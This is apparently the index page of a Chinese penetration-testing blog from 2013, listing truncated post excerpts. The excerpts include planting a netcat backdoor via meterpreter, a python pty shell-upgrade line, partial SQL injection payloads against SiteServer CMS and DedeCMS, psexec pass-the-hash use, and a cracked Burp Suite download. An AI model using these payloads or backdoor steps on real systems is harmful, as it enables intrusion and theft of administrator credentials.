暗月博客|网络安全,WEB渗透,数据安全,渗透编程,安全培训

BT5创建NC反弹型后门

mOon    渗透测试     6017次查看    抢沙发    2013年01月25日

本菜已经通过九区最新的ping溢出,获得了一台机器的系统权限,我们来安装NC,方便下次DIR溢出,嗯!    上传NC到目标机器C:\\windows\\system32\\ meterpreter > upload /tmp/nc.exe C:\\windows\\system32\\ [*] uploading  : /tmp/nc.exe ->...

linux内网渗透笔记

mOon    渗透测试     5404次查看    抢沙发    2013年01月21日

by:vitter@safechina.net blog:blog.securitycn.net 用nst的反弹后门连上nc后不能su交互,报错如下: standard in must be a tty 解决方法: python -c ’import pty; pty.spawn("/bin/sh")’ 得到shell就可以su进行交互了。 ps:最近渗透测试中遇到的几个值得注意的情况,...

burpsuite_pro_v1.5(精品渗透视频)

mOon    原创作品     18509次查看    10条评论    2013年01月20日

burpsuite_pro_v1.5(精品渗透视频) 工具破解出来没多少天。哪就做一下视频 演示一下这个神器的强大吧 哈哈 ..... 教程将近600m 有的朋友问我为什么做的那么大 。 我的回答是。既然是精品渗透教程 。视频一定要清晰。看了才不会觉得蛋疼。不清晰的教程 俺是不会做的。................ 7z的 去百度一下下载个7z解压工具吧 教程里面演示到的东西 都可以在...

burpsuite_pro_v1.5_crack最新版本及使用方法

mOon    原创作品     7442次查看    抢沙发    2013年01月19日

burpsuite_pro_v1.5_crack最新版本及使用方法 Burp Suite是一个Web应用程序集成渗透测试平台,它包含了一系列burp工具,这些工具之间有大量接口可以互相通信。平台中所有工具共享同一robust框架,以便统一处理HTTP请求,持久性,认证,上游代理,日志记录,报警和可扩展性。 Burp Suite允许渗透测试者结合手工和自动技术去枚举、分析Web应用程序。 期待了...

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

mOon    代码审计     15475次查看    抢沙发    2013年01月10日

经测试秒杀最新的3.5版   stieserver官网:www.siteserver.cn       EXP:   直接访问UserCenter/login.aspx       用户名处输入:   123'insert into bairong_Administrator([U...

渗透测试流程图

mOon    渗透测试     10554次查看    抢沙发    2013年01月08日

XXXX有限公司 网站系统渗透测试报告

mOon    渗透测试     12127次查看    抢沙发    2013年01月08日

XXXX有限公司 网站系统渗透测试报告                  2011年3月2日 目  录 一、概述 3 1.1...

什么是渗透测试

mOon    渗透测试     5099次查看    抢沙发    2013年01月08日

如今虚拟化在各个企业中应用的越来越多,且火热的云计算也依托于此技术。虚拟化技术确实能够使物理资源的利用更加灵活和便捷,那么虚拟机的安全性如何?相比传统架构,是否像传说中的一样安全? 什么是虚拟化 虚拟化是指计算机元件在虚拟的基础上而不是真实的基础上运行。虚拟化技术可以扩大硬件的容量,简化软件的重新配置过程。CPU的虚拟化技术可以单 CPU模拟多CPU并行,允许一个平台同时运行多个操作系统,并...

DedeCMS会员中心短消息SQL注射0day漏洞

mOon    代码审计     4938次查看    抢沙发    2013年01月07日

作者:c4rp3nt3r 主页:http://www.0x50sec.org 需要:magic_quotes_gpc = Off DedeCMS会员中心短消息SQL注射漏洞,成功利用此漏洞可获得管理员密码等 看到微博上有人提了下,偶也发鸡肋了. http://bt/de/member/pm.php?dopost=read&id=1%27%20and%20@%60%27%60%20...

[使用Hash直接登录Windows]简单分析

mOon    渗透测试     4615次查看    抢沙发    2013年01月07日

由于msf用到exploit/windows/smb/psexec模块,所以猜想和pstool里面的PsExec.exe应该有些许联系 查看说明,PsExec.exe可以进行远程连接得到一个交互式cmdshell, C:\Documents and Settings\Administrator\桌面>PsExec.exe \\192.168.1.108 -u "admi nis...